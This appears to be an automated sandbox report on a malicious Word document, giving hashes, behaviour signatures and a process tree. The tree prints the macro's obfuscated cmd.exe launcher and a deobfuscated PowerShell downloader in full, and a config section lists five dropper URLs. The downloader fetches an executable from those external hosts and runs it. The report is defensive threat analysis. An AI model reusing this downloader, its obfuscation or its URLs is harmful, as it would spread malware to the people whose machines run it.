Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/05/2024, 23:24

General

  • Target

    652b8fb7c49c748a6b4083c4281f7bd2_JaffaCakes118.doc

  • Size

    136KB

  • MD5

    652b8fb7c49c748a6b4083c4281f7bd2

  • SHA1

    1dd91ca02e013657bae82e2b220516db7e01355e

  • SHA256

    9dac7aa1a05d4a87ef8db17cdf59a3f5e1dd6d0862588d79f62d3194a3bb5826

  • SHA512

    4805dd74da3ed7b5ffa0514d30807586b6a20ac6402c4c352affc41abc4ab8c85f81e8856ed1c542a3060730edca30a09a572763c330b41336db1be753d3d2d2

  • SSDEEP

    1536:F81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9OUVk0mksZHT:F8GhDS0o9zTGOZD6EbzCda0mkmHT

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://alistairmccoy.co.uk/0R

exe.dropper

http://erinkveld.eu/tKlZyU

exe.dropper

http://dentaware.com/PbF

exe.dropper

http://havmore.in/UXxra

exe.dropper

http://aphn.org/zTADPIb

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\652b8fb7c49c748a6b4083c4281f7bd2_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:540
    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2084
      • C:\Windows\system32\cmd.exe
        CmD /V:O/C"set LEA=uUTnlInWPSJGzFDwviio(Cxc)e8dp$mj0yVfOX;@Bb,+Eg:NHZhR}r{/\A3skL=.'ta- K&&for %W in (29;53;47;51;62;64;15;40;65;64;38;29;4;31;65;62;6;25;15;67;19;41;31;25;23;65;68;47;25;65;63;7;25;41;21;4;18;25;6;65;38;29;61;12;31;62;64;50;65;65;28;46;55;55;66;4;18;59;65;66;18;53;30;23;23;19;33;63;23;19;63;0;60;55;32;51;39;50;65;65;28;46;55;55;25;53;18;6;60;16;25;4;27;63;25;0;55;65;69;4;49;33;1;39;50;65;65;28;46;55;55;27;25;6;65;66;15;66;53;25;63;23;19;30;55;8;41;13;39;50;65;65;28;46;55;55;50;66;16;30;19;53;25;63;18;6;55;1;37;22;53;66;39;50;65;65;28;46;55;55;66;28;50;6;63;19;53;45;55;12;2;57;14;8;5;41;64;63;9;28;4;18;65;20;64;39;64;24;38;29;59;66;69;62;64;51;6;69;64;38;29;14;66;15;68;62;68;64;58;26;64;38;29;44;27;37;62;64;44;2;61;64;38;29;47;8;0;62;29;25;6;16;46;65;25;30;28;43;64;56;64;43;29;14;66;15;43;64;63;25;22;25;64;38;35;19;53;25;66;23;50;20;29;4;31;8;68;18;6;68;29;61;12;31;24;54;65;53;33;54;29;4;31;65;63;14;19;15;6;4;19;66;27;13;18;4;25;20;29;4;31;8;42;68;29;47;8;0;24;38;29;12;59;36;62;64;48;13;57;64;38;5;35;68;20;20;11;25;65;67;5;65;25;30;68;29;47;8;0;24;63;4;25;6;45;65;50;68;67;45;25;68;26;32;32;32;32;24;68;54;5;6;16;19;60;25;67;5;65;25;30;68;29;47;8;0;38;29;2;34;37;62;64;31;10;10;64;38;41;53;25;66;60;38;52;52;23;66;65;23;50;54;52;52;29;11;9;61;62;64;12;31;66;64;38;72)do set Zb9=!Zb9!!LEA:~%W,1!&&if %W geq 72 powershell.exe "!Zb9:*Zb9!=!""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe "$rNR='wBt';$ljt=new-object Net.WebClient;$Lzj='http://alistairmccoy.co.uk/0R@http://erinkveld.eu/tKlZyU@http://dentaware.com/PbF@http://havmore.in/UXxra@http://aphn.org/zTADPIb'.Split('@');$saK='RnK';$Daw = '38';$EdX='ETL';$NPu=$env:temp+'\'+$Daw+'.exe';foreach($ljP in $Lzj){try{$ljt.DownloadFile($ljP, $NPu);$zsO='HFA';If ((Get-Item $NPu).length -ge 80000) {Invoke-Item $NPu;$TVX='jJJ';break;}}catch{}}$GSL='zja';"
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4276

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\TCD8DA9.tmp\sist02.xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b3m4uvyv.t2h.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/540-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-5-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

    Filesize

    4KB

  • memory/540-3-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-8-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-12-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-14-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/540-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-16-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/540-17-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-22-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-20-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-540-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-19-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-18-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-33-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-43-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-569-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-1-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-539-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-541-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-21-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-542-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-543-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/540-566-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-567-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-568-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/540-565-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/4276-50-0x0000027928F70000-0x0000027928F92000-memory.dmp

    Filesize

    136KB